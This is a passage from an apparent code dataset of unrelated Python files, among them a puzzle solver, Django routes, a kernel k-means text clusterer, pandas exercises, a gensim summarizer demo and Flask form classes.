        source,targets = line.split(' contain ')
        source = source.replace(' bags','')
        if 'no other bags' not in targets:
            for starget in targets.split(', '):
                # NOTE(review): assumes single-digit counts (first char only).
                w = int(starget[0])
                target = re.search('([a-z]+ [a-z]+)',starget).group(1)
                g.add_edge(source,target,weight=w)
    return g
def get_parents_of(graph,node):
    """Number of distinct bag colours that can (transitively) contain *node*."""
    return len(nx.ancestors(graph,node))

def get_bags_in(graph,node):
    """Total number of bags contained (recursively) inside *node*.

    Each simple path from node to a descendant contributes the product of
    edge weights along the path, since counts multiply per nesting level.
    """
    countbags = []
    descendants = list(nx.descendants(graph,node))
    allpaths = list(nx.all_simple_paths(graph.subgraph(descendants+[node]),source=node,target=descendants))
    for path in allpaths:
        countbags.append(np.prod([graph[path[i]][path[i+1]]['weight'] for i in range(len(path)-1)]))
    return sum(countbags)

# Solve both puzzle parts for the 'shiny gold' bag.
with open('inputs/day7/input.txt','r') as rf:
    lines = rf.readlines()
graph = make_graph(lines)
print("Challenge 1: {}".format(get_parents_of(graph,'shiny gold')))
print("Challenge 2: {}".format(get_bags_in(graph,'shiny gold')))
|
993,424 | 911f458f1e66c83abadb684ae919737697191097 | """
"""
from django.conf.urls import include, url
import ckeditor
import rec_file
urlpatterns = [
    # CKEditor image-upload endpoint.
    url(r'^ckeditor_upload_image/?$',ckeditor.upload_image),
    # Generic file-upload endpoint.
    url(r'^upload/?$',rec_file.general)
]
|
993,425 | 6c1278d0fcadc4b3c8cfde312b136c0b1f15716f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 1 12:54:31 2018
@author: ajay yadav
"""
import random # for gentrating random things may be random letter or number
import string # for genrating the string
vowels ='aeiou' # vowel pool
consonants = 'bcdfghjklmnpqrstvwxy' # consonant pool (note: 'z' is absent)
letter = string.ascii_lowercase # any lowercase letter
list1 = ['v','c', 'l'] # valid per-position choices: vowel, consonant, any letter
# Ask the user for the pattern of the random word to generate.
_FIRST_PROMPT = "Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: "
_RETRY_PROMPT = "Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: "

def _ask_choice():
    """Prompt until the user types one of the valid codes in list1."""
    choice = input(_FIRST_PROMPT)
    while choice not in list1:  # re-prompt on invalid input
        choice = input(_RETRY_PROMPT)
    return choice

# One choice per letter position. The individual names are kept because
# genrate() reads them as module globals.
letter_input_1 = _ask_choice()
letter_input_2 = _ask_choice()
letter_input_3 = _ask_choice()
letter_input_4 = _ask_choice()
letter_input_5 = _ask_choice()
letter_input_6 = _ask_choice()

# Echo the pattern the user selected.
print(letter_input_1+letter_input_2+letter_input_3+letter_input_4+letter_input_5+letter_input_6)
def genrate():
    """Generate one random 6-letter word following the user's pattern.

    Reads the module-level letter_input_1..6 choices: 'v' draws from
    vowels, 'c' from consonants, and anything else from the full
    lowercase alphabet — identical behaviour to the original six
    copy-pasted if/elif blocks, collapsed into a pool lookup.
    """
    pools = {'v': vowels, 'c': consonants}
    pattern = (letter_input_1, letter_input_2, letter_input_3,
               letter_input_4, letter_input_5, letter_input_6)
    return ''.join(random.choice(pools.get(code, letter)) for code in pattern)
# Ask how many words to produce, then print that many random words.
no_of_words_to_be_genrated = input("Enter the no. of words you want to genrate:")
for i in range(int(no_of_words_to_be_genrated)):
    print(genrate())
|
993,426 | 4e1fdb37bf9a19d239beface68e20dedee205f35 | """
Решение системы
x^2+y^2=1
y=tan(x)
"""
"""
Графически локализуем корни
Получаем
x_1 = [0.6 , 0.7]
y_1 = [0.7, 0.8]
Искать будем только один корень в этом интервале, так как в виду специфики
уравнений, если (x*, y*) является корнем, то (-x*,-y*) также является корнем
"""
"""
Выберем следующее выражение
x= arctan(y) = p_1
y = sqrt(1-x^2) = p_2
Так как частная производная p_1 по х равна нулю, а по у равна 1/(1+y^2), то
номра матрицы будет меньше единицы, а значит метод простой итерации будет сходиться
"""
"""
Оценка числа необходимых итераций, k>=log_q(1-q)*eps
При q = 2/3 и eps = 1e-6
"""
import numpy as np
def get_next_point(x, y):
    """One fixed-point iteration step: x' = arctan(y), y' = sqrt(1 - x^2)."""
    next_x = np.arctan(y)
    next_y = np.sqrt(1.0 - x ** 2)
    return next_x, next_y
# Initial guess inside the graphically localised root interval.
x= 0.6
y=0.7
xes =[]
yes = []
xes.append(x)
yes.append(y)
# 35 iterations comfortably exceed the estimated iteration count for eps=1e-6.
for _ in range(35):
    x,y = get_next_point(x,y)
    xes.append(x)
    yes.append(y)
# plt.scatter(xes,yes)
# plt.show()
# Residuals of both original equations should be ~0 at the fixed point.
print("Проверка полученного значения")
print(x**2+y**2-1)
print(y - np.tan(x))
print("~~~~~~~~~~~~~~~~~~")
# By symmetry of the system, (-x, -y) is also a root.
print("Ответ,",[x,y], [-x,-y])
|
993,427 | ed9be598d20ad7ef324962bbb1f547204008808c | import requests
res = requests.get('https://torina.top')
# Bug fix: requests.Response has no .txt attribute (that raised
# AttributeError); the decoded body is exposed as .text.
print(res.text)
993,428 | 1afe5509342ddb50639daebb9efe5f535f54d042 | import elasticsearch
from elasticsearch import helpers
import collections
class ElasticService:
    """Thin wrapper around elasticsearch-py for (re)creating an index."""

    @staticmethod
    def create_index_with_data(data, index: str, request_body: dict):
        """Drop *index* if it exists, recreate it with *request_body*
        settings/mappings, and bulk-load *data* (an iterable of documents).
        Connects to the default localhost Elasticsearch node.
        """
        es = elasticsearch.Elasticsearch()
        # Ignore 404 error when index doesn't exist.
        es.indices.delete(index=index, ignore=404)
        # Ignore 400 error caused by IndexAlreadyExistsException when creating an index
        es.indices.create(index=index, body=request_body, ignore=400)
        # Bulk add documents; deque(...) just drains the parallel_bulk
        # generator so every action is executed.
        collections.deque(helpers.parallel_bulk(client=es, actions=data, index=index))
        # Refresh Index so the new documents are searchable immediately.
        es.indices.refresh()
|
993,429 | 63b7eb90392f121e0f85962e3a5c0175c93ea9da | import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
# 数据归一化预处理
class StandardScaler:
    """Per-column standardisation (zero mean, unit variance).

    mean_ and scaler_ hold the per-column mean and population standard
    deviation learned by fit(); transform() applies them to new data.
    """

    def __init__(self):
        # Learned statistics; populated by fit().
        self.mean_ = None
        self.scaler_ = None

    def fit(self, X):
        """Learn per-column mean and std from the 2-D training matrix X."""
        assert X.ndim == 2
        self.mean_ = X.mean(axis=0)
        self.scaler_ = X.std(axis=0)
        return self

    def transform(self, X):
        """Standardise X column-wise using the statistics learned by fit()."""
        assert X.ndim == 2
        assert self.mean_ is not None and self.scaler_ is not None
        assert X.shape[1] == len(self.mean_)
        return (X - self.mean_) / self.scaler_
iris = load_iris()
X = iris.data
Y = iris.target
# Fit the scaler on the training split only, then apply it to the test split
# so no test-set statistics leak into the preprocessing.
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=666)
standardScaler = StandardScaler()
standardScaler.fit(X_train)
X_test_standard = standardScaler.transform(X_test)
print(X_test_standard)
|
993,430 | c171c893e0b55a163a52d4689a07ca66fe7471b9 | l_num_alpha=["ZERO","ONE","TWO","THREE","FOUR","FIVE","SIX","SEVEN","EIGHT","NINE"]
l_num_int = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

# Map English digit names (l_num_alpha, defined above) to digits until the
# user quits. Replaces the original `while 1==1` loop, the redundant second
# .upper() call, and the brittle for/elif/continue scan with a direct
# membership test and parallel-list index lookup — same output for all inputs.
while True:
    num_alpha = str(input("영문 숫자명을 입력하시요 ")).upper()
    if num_alpha == 'Q':
        print("프로그램을 종료합니다. 안녕~^^ ")
        break
    if num_alpha in l_num_alpha:
        # Parallel lists: the same index in l_num_int is the digit value.
        print(l_num_int[l_num_alpha.index(num_alpha)])
    else:
        print("모르는 숫자입니다.")
993,431 | 36b4f1df4632d1a19145e8d46a603d81ccd2c884 | # Raspberry Pi Pico - I2C LCD
# Datei: buch-rpi-pico-kap6-i2c-lcd.py
# Bibliothek
from machine import I2C, Pin
from lcd_api import LcdApi
from pico_i2c_lcd import I2cLcd
import utime
# Variables / objects
I2C_ADDR = 0x3F
I2C_NUM_ROWS = 2
I2C_NUM_COLS = 16
# Bug fix: only the names I2C and Pin are imported ("from machine import
# I2C, Pin"), so `machine.Pin(...)` raised NameError; use Pin directly.
sda = Pin(8)
scl = Pin(9)
i2c = I2C(0, sda=sda, scl=scl, freq=400000)
lcd = I2cLcd(i2c, I2C_ADDR, I2C_NUM_ROWS, I2C_NUM_COLS)

# Main loop: redraw the two menu lines every 2 seconds.
while True:
    lcd.clear()
    lcd.backlight_on()
    # NOTE(review): confirm the argument order move_to(col, row) and the
    # intended cursor positions against the pico_i2c_lcd driver.
    lcd.move_to(1,0)
    lcd.putstr("1: Raspberry Pi")
    lcd.move_to(2,1)
    lcd.putstr("2: Pico")
    utime.sleep(2)
993,432 | 48230167eab0fc5f43cae9b6ac5bad38ed650a80 | import numpy as np
from sklearn.base import BaseEstimator, ClusterMixin
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.utils import check_random_state
from sklearn import metrics
import os, glob
from sklearn.decomposition import TruncatedSVD
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import Normalizer
from time import time
import numpy as np
prev = np.zeros(7095)
class KernelKMeans(BaseEstimator, ClusterMixin):
    """
    Kernel K-means
    Reference
    ---------
    Kernel k-means, Spectral Clustering and Normalized Cuts.
    Inderjit S. Dhillon, Yuqiang Guan, Brian Kulis.
    KDD 2004.

    NOTE: this file is Python 2 code (print statements, xrange).
    """
    def __init__(self, n_clusters=3, max_iter=50, tol=1e-3, random_state=None,
                 kernel="polynomial", gamma=.0097, degree=2, coef0=3,
                 kernel_params=None, verbose=0):
        self.n_clusters = n_clusters
        self.max_iter = max_iter
        self.tol = tol                      # convergence threshold on label churn
        self.random_state = random_state
        self.kernel = kernel
        self.gamma = gamma
        self.degree = degree
        self.coef0 = coef0
        self.kernel_params = kernel_params  # used only when kernel is callable
        self.verbose = verbose

    @property
    def _pairwise(self):
        # Tells scikit-learn whether X is a precomputed kernel matrix.
        return self.kernel == "precomputed"

    def _get_kernel(self, X, Y=None):
        """Evaluate the configured kernel between X and Y (or X with itself)."""
        if callable(self.kernel):
            params = self.kernel_params or {}
        else:
            params = {"gamma": self.gamma,
                      "degree": self.degree,
                      "coef0": self.coef0}
        return pairwise_kernels(X, Y, metric=self.kernel,
                                filter_params=True, **params)

    def fit(self, X, y=None, sample_weight=None):
        '''computes the model by calculating centroids for each cluster'''
        n_samples = X.shape[0]
        K = self._get_kernel(X)
        # NOTE(review): `if sample_weight` raises "truth value is ambiguous"
        # for ndarray weights; an explicit `is not None` test looks intended
        # — confirm.
        sw = sample_weight if sample_weight else np.ones(n_samples)
        self.sample_weight_ = sw
        rs = check_random_state(self.random_state)
        # Random initial cluster assignment.
        self.labels_ = rs.randint(self.n_clusters, size=n_samples)
        dist = np.zeros((n_samples, self.n_clusters))
        self.within_distances_ = np.zeros(self.n_clusters)
        for it in xrange(self.max_iter):
            dist.fill(0)
            self._compute_dist(K, dist, self.within_distances_, update_within=True)
            labels_old = self.labels_
            self.labels_ = dist.argmin(axis=1)
            # Compute the number of samples whose cluster did not change
            # since last iteration.
            n_same = np.sum((self.labels_ - labels_old) == 0)
            if 1 - float(n_same) / n_samples < self.tol:
                if self.verbose:
                    print "Converged at iteration", it + 1
                break
        self.X_fit_ = X
        # NOTE(review): this binds a *local* prev, not the module-level
        # `prev = np.zeros(7095)` defined at the top of the file — confirm
        # whether a `global prev` statement was intended.
        prev = self.labels_
        return self

    def _compute_dist(self, K, dist, within_distances, update_within):
        """Compute a n_samples x n_clusters distance matrix using the
        kernel trick."""
        sw = self.sample_weight_
        for j in xrange(self.n_clusters):
            mask = self.labels_ == j
            if np.sum(mask) == 0:
                raise ValueError("Empty cluster found, try smaller n_cluster.")
            denom = sw[mask].sum()
            denomsq = denom * denom
            if update_within:
                # Within-cluster term: weighted average kernel value of
                # cluster j with itself (the ||mu_j||^2 part of the distance).
                KK = K[mask][:, mask]
                dist_j = np.sum(np.outer(sw[mask], sw[mask]) * KK / denomsq)
                within_distances[j] = dist_j
                dist[:, j] += dist_j
            else:
                dist[:, j] += within_distances[j]
            dist[:, j] -= 2 * np.sum(sw[mask] * K[:, mask], axis=1) / denom  # calculating distance of each point from centroid of cluster j by finding
            # diff. b/w centroid of cluster j & similarity of it with points in cluster j

    def predict(self, X):
        '''Uses the model calculated to predict for each document the closest cluster it belongs to'''
        K = self._get_kernel(X, self.X_fit_)
        n_samples = X.shape[0]
        dist = np.zeros((n_samples, self.n_clusters))
        self._compute_dist(K, dist, self.within_distances_,update_within=False)
        return dist.argmin(axis=1)
def main():
true_k = 4
labels = []
training_set = []
path = os.getcwd()+'/classicdocs/classic/'
for file in glob.glob(os.path.join(path, '*')):
data = ""
for line in open(file) :
data += line
training_set.append(data)
if 'cacm' in str(file):
labels.append(0)
elif 'cisi' in str(file):
labels.append(1)
elif 'cran' in str(file):
labels.append(2)
elif 'med' in str(file):
labels.append(3)
n_components = 20
print 'Total Samples',len(training_set)
print("Extracting features from the training dataset using a sparse vectorizer")
# Perform an IDF normalization on the output of HashingVectorizer
'''It turns a collection of text documents into a scipy.sparse matrix holding token occurrence counts
This text vectorizer implementation uses the hashing trick to find the token string name to feature integer index mapping.'''
hasher = HashingVectorizer(stop_words='english', non_negative=True,norm=None, binary=False)
'''Transform a count matrix to a normalized tf-idf representation. It provides IDF weighting.'''
vectorizer = make_pipeline(hasher, TfidfTransformer(norm='l2', smooth_idf=True, sublinear_tf=False, use_idf=True))
X = vectorizer.fit_transform(training_set)
if n_components:
print("Performing dimensionality reduction using SVD")
'''This transformer performs linear dimensionality reduction by means of singular value decomposition (SVD)'''
svd = TruncatedSVD(n_components)
lsa = make_pipeline(svd, Normalizer(copy=False))
X = lsa.fit_transform(X)
km = KernelKMeans(n_clusters= 5, max_iter=100, verbose=1)
km.fit_predict(X)
predict = km.predict(X)
print 'Adjusted_Rand_Score',metrics.adjusted_rand_score(labels, predict)
print 'Mutual Info',metrics.adjusted_mutual_info_score(labels, predict)
print("Homogeneity: %0.3f" % metrics.homogeneity_score(labels, predict))
if __name__ == '__main__':
main()
|
993,433 | 587936592b2de26a97be21ae06024583e8958101 | # 1.
# Pandas DataFrame tutorial: a sequence of small numbered exercises that
# build, index, slice and transpose DataFrames, printing each result.
# 1.
print("Output of 1st program is: ")
import pandas as pd
d = pd.DataFrame([5, 2, 4, 8])
print(d)
print(d[0])
# 2.
print("\n\nOutput of 2nd Program is: ")
d = pd.DataFrame({'a': [5, 2, 4, 8]})
print(d)
# 3.
print("\n\nOutput of 3rd Program is: ")
print(d['a'][1])
# 4.
print("\n\nOutput of 4th Program is: ")
d = pd.DataFrame({'a': [5, 2, 4, 8], 'b': [4, 8, 5, 2]})
print(d)
# 5.
print("Output of 5th Program is: ")
print(d['a'][1])
print("\n", d['b'][1])
# 6.
print("Output of 6th Program is: ")
D = d.T
print(D, "\n")
print(D[1], "\n")
print("Shape is: ", D.shape)
print("Dimension is: ", D.ndim)
print("Size is: ", D.size)
# 7.
print("\n\nOutput of 7th Program is: ")
d = pd.DataFrame([[5, 2, 4, 8], [4, 8, 5, 2]], columns=['a', 'b', 'c', 'd'], index=['abc', 'xyz'])
print(d)
# 8.
print("\n\nOutput of 8th Program is: ")
print(d['b'][1])
print(d['b'][0])
print(d['c'][0])
print(d['c'][1])
print(d[['b', 'c']], "\n")
d['e'] = d['c'] + d['d']
print(d, "\n")
# Fix: select columns with a list, not a set -- sets are unordered (column
# order was nondeterministic) and recent pandas rejects set indexers.
m = d[['a', 'b']]
print(m, '\n')
print("Type of m is: ", type(m))
# 9.
print("\n\nOutput of 9th Program is: ")
print(d[:], "\n")
print(d[0:1], "\n")
print(d[1:2], "\n")
print(d['a'][0:2], "\n")
print(d['a'][0:1], "\n")
print(d['a':'b'][0:1], "\n")
print(d[0:2][0:1], "\n")
print(d[['a', 'b']][0:1], "\n")   # fix: list instead of set indexer
print(d[['a', 'b']][0:1], "\n")
print(d.T)
# 10.
##
##d1=pd.DataFrame([[5,2,4,8],[4,8,5,2]],columns=['a','b','c','d'],index=['a','b'])
##d2=pd.DataFrame([[4,8,5,2],[45,2,4,8]],columns=['a','b','c','d'],index=['a','b'])
##s=d.add(d1,d2)
##print(s)
# 11.
import numpy as np
print("Output of 11th Program is : ")
a = np.arange(50).reshape(5, 10)
d = pd.DataFrame(a)
print(d, "\n\n")
d = pd.DataFrame(a, columns=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], index=['a', 'b', 'c', 'd', 'e'])
print(d, "\n")
print(d[['b', 'c']][0:2], "\n")
print(d[['b', 'c']][0:], "\n")
print(d[['b', 'c']][0:4], "\n")
print(d[['b', 'c']][0:2].sum(), "\n")
print(d.columns, "\n")
print(d.index, "\n")
# Fix: .iloc is an indexer and must be subscripted, not called;
# d.iloc(0) printed the indexer object instead of the first row.
print(d.iloc[0], "\n")
print(d[0:1], "\n")
print(d.iloc[0:3])
|
993,434 | 1bd34ce0f0ec2d0dc94e2b3c1dd4c7ae4e0927df | import numpy as np
def fit(X_train, Y_train):
    """Train a discrete naive-Bayes model by counting feature values per class.

    Parameters
    ----------
    X_train : 2-D numpy array of discrete feature values,
        shape (n_samples, n_features).
    Y_train : 1-D numpy array of class labels, length n_samples.

    Returns
    -------
    dict
        result["total_data"]      -> total number of training samples
        result[c]["total_count"]  -> number of samples of class c
        result[c][j][v]           -> number of samples of class c whose j-th
                                     feature (1-based) equals v
    """
    result = {}
    class_values = set(Y_train)
    result["total_data"] = len(Y_train)
    for current_class in class_values:
        result[current_class] = {}
        current_class_rows = (Y_train == current_class)
        X_train_current = X_train[current_class_rows]
        Y_train_current = Y_train[current_class_rows]
        num_features = X_train.shape[1]
        result[current_class]['total_count'] = len(Y_train_current)
        for j in range(1, num_features + 1):
            result[current_class][j] = {}
            # Fix: feature keys are 1-based but columns are 0-based; the
            # original indexed X_train[:, j] and overran the last column.
            all_possible_values = set(X_train[:, j - 1])
            for current_value in all_possible_values:
                result[current_class][j][current_value] = (
                    X_train_current[:, j - 1] == current_value).sum()
    # Fix: the original built `result` but never returned it.
    return result
|
993,435 | e4a6fb40f325c69cf63e7c1e3bf8b6fbf46c6ac4 | # Generated by Django 2.2.4 on 2021-08-24 10:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration adding a nullable `iptv` foreign key to
    Event and to its history mirror HistoricalEvent."""

    dependencies = [
        ('objects', '0003_auto_20210823_1430'),
        ('dispatching', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='event',
            name='iptv',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='event_iptv', to='objects.IPTV', verbose_name='Каналы IPTV'),
        ),
        migrations.AddField(
            model_name='historicalevent',
            name='iptv',
            # NOTE(review): DO_NOTHING + db_constraint=False presumably lets
            # history rows outlive the referenced IPTV row -- confirm.
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='objects.IPTV', verbose_name='Каналы IPTV'),
        ),
    ]
|
993,436 | c4f62970a60a784fe1852a8231d0b58f5136a34f | print "Hello, world, I am not becoming a Git Ninja" |
993,437 | dfdc3495e93a3ff16d18535b2e0b5b9e45ea8482 | # OK
# https://www.machinelearningplus.com/nlp/text-summarization-approaches-nlp-example/
# sudo pip3 install gensim
# pip3 show gensim | grep Version
# sudo pip3 install -U gensim
# sudo python3 -m pip install -U gensim
# sudo pip install gensim --user
# sudo pip3 install --upgrade gensim
# python3 -m pip install gensim
# pip freeze | grep gensim
# fix for ModuleNotFoundError: No module named 'gensim.summarization'
# https://discuss.streamlit.io/t/no-module-named-gensim-summarization/11780/2
# sudo pip3 install gensim==3.8.3
"""
import sys, os
# */site-packages is where your current session is running its python out of
site_path = ''
for path in sys.path:
if 'site-packages' in path.split('/')[-1]:
print(path)
site_path = path
# search to see if gensim in installed packages
if len(site_path) > 0:
if not 'gensim' in os.listdir(site_path):
print('package not found')
else:
print('gensim installed')
"""
original_text = 'Junk foods taste good that’s why it is mostly liked by everyone of any age group especially kids and ' \
'school going children. They generally ask for the junk food daily because they have been trend so by ' \
'their parents from the childhood. They never have been discussed by their parents about the harmful ' \
'effects of junk foods over health. According to the research by scientists, it has been found that ' \
'junk foods have negative effects on the health in many ways. They are generally fried food found in ' \
'the market in the packets. They become high in calories, high in cholesterol, low in healthy ' \
'nutrients, high in sodium mineral, high in sugar, starch, unhealthy fat, lack of protein and lack of ' \
'dietary fibers. Processed and junk foods are the means of rapid and unhealthy weight gain and ' \
'negatively impact the whole body throughout the life. It makes able a person to gain excessive ' \
'weight which is called as obesity. Junk foods tastes good and looks good however do not fulfil the ' \
'healthy calorie requirement of the body. Some of the foods like french fries, fried foods, pizza, ' \
'burgers, candy, soft drinks, baked goods, ice cream, cookies, etc are the example of high-sugar and ' \
'high-fat containing foods. It is found according to the Centres for Disease Control and Prevention ' \
'that Kids and children eating junk food are more prone to the type-2 diabetes. In type-2 diabetes ' \
'our body become unable to regulate blood sugar level. Risk of getting this disease is increasing as ' \
'one become more obese or overweight. It increases the risk of kidney failure. Eating junk food daily ' \
'lead us to the nutritional deficiencies in the body because it is lack of essential nutrients, ' \
'vitamins, iron, minerals and dietary fibers. It increases risk of cardiovascular diseases because it ' \
'is rich in saturated fat, sodium and bad cholesterol. High sodium and bad cholesterol diet increases ' \
'blood pressure and overloads the heart functioning. One who like junk food develop more risk to put ' \
'on extra weight and become fatter and unhealthier. Junk foods contain high level carbohydrate which ' \
'spike blood sugar level and make person more lethargic, sleepy and less active and alert. Reflexes ' \
'and senses of the people eating this food become dull day by day thus they live more sedentary life. ' \
'Junk foods are the source of constipation and other disease like diabetes, heart ailments, ' \
'clogged arteries, heart attack, strokes, etc because of being poor in nutrition. Junk food is the ' \
'easiest way to gain unhealthy weight. The amount of fats and sugar in the food makes you gain weight ' \
'rapidly. However, this is not a healthy weight. It is more of fats and cholesterol which will have a ' \
'harmful impact on your health. Junk food is also one of the main reasons for the increase in obesity ' \
'nowadays.This food only looks and tastes good, other than that, it has no positive points. The ' \
'amount of calorie your body requires to stay fit is not fulfilled by this food. For instance, ' \
'foods like French fries, burgers, candy, and cookies, all have high amounts of sugar and fats. ' \
'Therefore, this can result in long-term illnesses like diabetes and high blood pressure. This may ' \
'also result in kidney failure. Above all, you can get various nutritional deficiencies when you ' \
'don’t consume the essential nutrients, vitamins, minerals and more. You become prone to ' \
'cardiovascular diseases due to the consumption of bad cholesterol and fat plus sodium. In other ' \
'words, all this interferes with the functioning of your heart. Furthermore, junk food contains a ' \
'higher level of carbohydrates. It will instantly spike your blood sugar levels. This will result in ' \
'lethargy, inactivates, and sleepiness. A person reflex becomes dull overtime and they lead an ' \
'inactive life. To make things worse, junk food also clogs your arteries and increases the risk of a ' \
'heart attack. Therefore, it must be avoided at the first instance to save your life from becoming ' \
'ruined.The main problem with junk food is that people don’t realize its ill effects now. When the ' \
'time comes, it is too late. Most importantly, the issue is that it does not impact you instantly. It ' \
'works on your overtime; you will face the consequences sooner or later. Thus, it is better to stop ' \
'now.You can avoid junk food by encouraging your children from an early age to eat green vegetables. ' \
'Their taste buds must be developed as such that they find healthy food tasty. Moreover, try to mix ' \
'things up. Do not serve the same green vegetable daily in the same style. Incorporate different ' \
'types of healthy food in their diet following different recipes. This will help them to try foods at ' \
'home rather than being attracted to junk food.In short, do not deprive them completely of it as that ' \
'will not help. Children will find one way or the other to have it. Make sure you give them junk food ' \
'in limited quantities and at healthy periods of time. '
# Importing package and summarizer
"""original_text = 'The conversation Sam Harris what are the most influential and pioneering thinkers of our time hes
a host of The Making Sense podcast and the author of many similar books and human nature and the human mind including
the end of Faith the moral landscape lying free will and waking up. He also has a meditation app called waking up and
Ive been using to guide my own meditation. ' """
# NOTE: gensim.summarization was removed in gensim 4.x; per the notes at the
# top of this file this script requires gensim==3.8.3 (or earlier).
import gensim
from gensim.summarization import summarize
# Passing the text corpus to summarizer
short_summary = summarize(original_text)
print(short_summary)
print("--------------")
# Summarization by ratio: keep roughly 5% of the sentences.
summary_by_ratio = summarize(original_text, ratio=0.05)
print(summary_by_ratio)
print("--------------")
# Summarization by word count: cap the summary at ~30 words.
summary_by_word_count = summarize(original_text, word_count=30)
print(summary_by_word_count)
print("--------------")
# Summarization when both ratio & word count is given
summary = summarize(original_text, ratio=0.1, word_count=30)
print(summary)
|
993,438 | a3b19f02a72320a0f15e090ec5b63f9cc225beaa | # Write a Python function to create the HTML string with tags around the word(s).
# Sample function and result :
# add_tags('i', 'Python') -> '<i>Python</i>'
# add_tags('b', 'Python Tutorial') -> '<b>Python Tutorial </b>'
def add_tags(tag, message):
    """Return *message* wrapped in an opening and closing HTML *tag*."""
    return f"<{tag}>{message}</{tag}>"

print(add_tags('b', 'python testo'))
|
993,439 | d73472a15cb29dcc0202043d2bcf4b31a6a13e56 | import simplejson as json
from flask_wtf import Form
from wtforms import StringField, IntegerField, SelectField
from wtforms.widgets import TextInput, FileInput, HiddenInput
from wtforms.validators import Required, Optional, NumberRange, Length, Regexp
import logging
log = logging.getLogger(__name__)
# If present, rule alias' must be a string containing at least one non-numeric character.
RULE_ALIAS_REGEXP = "(^[a-zA-Z][a-zA-Z0-9-]*$|^$)"
class DisableableTextInput(TextInput):
    """A TextInput widget that supports being disabled."""
    def __init__(self, disabled, *args, **kwargs):
        # Whether to render the input with the HTML `disabled` attribute.
        self.disabled = disabled
        TextInput.__init__(self, *args, **kwargs)
    def __call__(self, *args, **kwargs):
        # Inject the attribute at render time so templates need no changes.
        if self.disabled:
            kwargs['disabled'] = 'disabled'
        return TextInput.__call__(self, *args, **kwargs)
class JSONStringField(StringField):
    """StringField that parses incoming data as JSON."""
    def process_formdata(self, valuelist):
        if valuelist and valuelist[0]:
            try:
                self.data = json.loads(valuelist[0])
            # XXX: use JSONDecodeError when the servers support it
            except ValueError as e:
                # WTForms catches ValueError, which JSONDecodeError is a child
                # of. Because of this, we need to wrap this error in something
                # else in order for it to be properly raised.
                log.debug('Caught ValueError')
                self.process_errors.append(e.args[0])
        else:
            log.debug('No value list, setting self.data to default')
            self._set_default()
    def _set_default(self):
        # Subclasses may override this to supply a different default container.
        self.data = {}
    def _value(self):
        # Serialize back to JSON so the form field can be re-rendered.
        return json.dumps(self.data) if self.data is not None else u''
class NullableStringField(StringField):
    """StringField that parses incoming data converting empty strings to None's."""
    def process_formdata(self, valuelist):
        # Fix: the original nested `if valuelist[0] == ''` branch was
        # unreachable -- an empty string is falsy, so it could never pass the
        # enclosing `if valuelist and valuelist[0]` guard. Empty and missing
        # values both normalize to None, which is the documented behavior.
        if valuelist and valuelist[0]:
            self.data = valuelist[0]
        else:
            log.debug('No value list, setting self.data to None')
            self.data = None
def NoneOrType(type_):
    """A helper method for SelectField's that returns the value coerced to
    the specified type when it is not None. By default, a SelectField coerces
    None to unicode, which ends up as u'None'."""
    def coercer(value):
        # Pass None through untouched; coerce everything else.
        return value if value is None else type_(value)
    return coercer
class DbEditableForm(Form):
    """Base form for edits to versioned DB rows; carries the row's hidden
    data_version (presumably for optimistic-concurrency checks -- confirm)."""
    data_version = IntegerField('data_version', validators=[Required()], widget=HiddenInput())
class NewPermissionForm(Form):
    """Form for creating a permission; options are submitted as JSON."""
    options = JSONStringField('Options')
class ExistingPermissionForm(DbEditableForm):
    """Form for editing an existing permission; inherits data_version."""
    options = JSONStringField('Options')
class PartialReleaseForm(Form):
    """Form for creating or partially updating a release's JSON blob."""
    # Because we do implicit release creation in the Releases views, we can't
    # have data_version be Required(). The views are responsible for checking
    # for its existence in this case.
    data_version = IntegerField('data_version', widget=HiddenInput())
    product = StringField('Product', validators=[Required()])
    hashFunction = StringField('Hash Function')
    data = JSONStringField('Data', validators=[Required()])
    schema_version = IntegerField('Schema Version')
    copyTo = JSONStringField('Copy To', default=list)
    alias = JSONStringField('Alias', default=list)
class RuleForm(Form):
    """Form for creating an update rule; most matching fields are nullable
    strings so an empty input means "match anything"."""
    backgroundRate = IntegerField('Background Rate', validators=[Required(), NumberRange(0, 100)])
    priority = IntegerField('Priority', validators=[Required()])
    # Choices are populated by the view at request time.
    mapping = SelectField('Mapping', validators=[])
    alias = NullableStringField('Alias', validators=[Length(0, 50), Regexp(RULE_ALIAS_REGEXP)])
    product = NullableStringField('Product', validators=[Length(0, 15)])
    version = NullableStringField('Version', validators=[Length(0, 10)])
    buildID = NullableStringField('BuildID', validators=[Length(0, 20)])
    channel = NullableStringField('Channel', validators=[Length(0, 75)])
    locale = NullableStringField('Locale', validators=[Length(0, 200)])
    distribution = NullableStringField('Distribution', validators=[Length(0, 100)])
    buildTarget = NullableStringField('Build Target', validators=[Length(0, 75)])
    osVersion = NullableStringField('OS Version', validators=[Length(0, 1000)])
    distVersion = NullableStringField('Dist Version', validators=[Length(0, 100)])
    whitelist = NullableStringField('Whitelist', validators=[Length(0, 100)])
    comment = NullableStringField('Comment', validators=[Length(0, 500)])
    update_type = SelectField('Update Type', choices=[('minor', 'minor'), ('major', 'major')], validators=[])
    headerArchitecture = NullableStringField('Header Architecture', validators=[Length(0, 10)])
class EditRuleForm(DbEditableForm):
    """Form for editing an existing rule. Mirrors RuleForm but every field is
    Optional() so partial edits can be submitted; NoneOrType keeps omitted
    values from being coerced to u'None'."""
    backgroundRate = IntegerField('Background Rate', validators=[Optional(), NumberRange(0, 100)])
    priority = IntegerField('Priority', validators=[Optional()])
